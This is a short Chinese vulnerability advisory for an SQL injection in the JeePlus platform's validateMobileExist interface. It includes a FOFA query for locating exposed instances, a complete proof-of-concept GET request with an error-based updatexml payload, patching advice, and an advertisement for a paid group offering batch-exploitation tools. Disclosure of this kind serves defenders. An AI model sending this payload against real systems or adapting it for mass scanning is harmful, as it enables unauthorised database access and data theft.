Jeeplus快速开发平台 validateMobileExist SQL注入漏洞

0x01 免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！！！

0x02 产品介绍

JeePlus（洁普斯）是一个软件快速开发平台，使用多种现代Web技术，包括Spring Cloud/Spring Boot、MyBatis Plus、Spring Security、Redis、Vue3、Element Plus等。该平台支持多种数据库，如MySQL、Oracle、sqlserver、postgresql等。JeePlus采用标准的SOA架构，依托优秀的前台富客户端框架（如Extjs4.2）实现展示层的MVC（Model View Controller）再分层。它还利用内部升级版的SSH2应用框架和独有的DynaBean数据处理模式，使SQL执行更快更灵活。此外，JeePlus是一个低代码开发平台，解决了开发中大量的重复工作，让开发者更多聚焦业务逻辑，快速开发和部署现代Web应用程序+微服务架构。通过使用JeePlus，可以设计数据库表、配置表单模型、生成代码、一键生成菜单等，从而实现自动建表，根据表生成对应的Domain/DTO、Service、Mapper、Controller、Vue等，支持增删改查/排序/导出导入Excel/权限控制/功能生成直接使用等功能。同时，JeePlus还支持多租户技术，保证系统共性的部分被共享，个性的部分被单独隔离。

0x03 漏洞威胁

JeePlus快速开发平台  validateMobileExist 接口处存在SQL注入漏洞，攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

0x04 漏洞环境

FOFA：

app="JeePlus"

0x05 漏洞复现

POC

GET /a/sys/user/validateMobileExist?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+version%28%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

查询数据库版本

0x06 批量验证脚本

Nuclei验证脚本已发布
知识星球：冷漠安全

0x07 修复建议

关闭互联网暴露面或接口设置访问权限

升级JeePlus至最新版本

官网下载最新安全补丁：http://www.jeeplus.org/

漏洞详情及批量检测POC工具请前往知识星球获取
知识星球：冷漠安全
交个朋友，限时优惠券：加入立减25
星球福利：每天更新最新漏洞POC、资料文献、内部工具等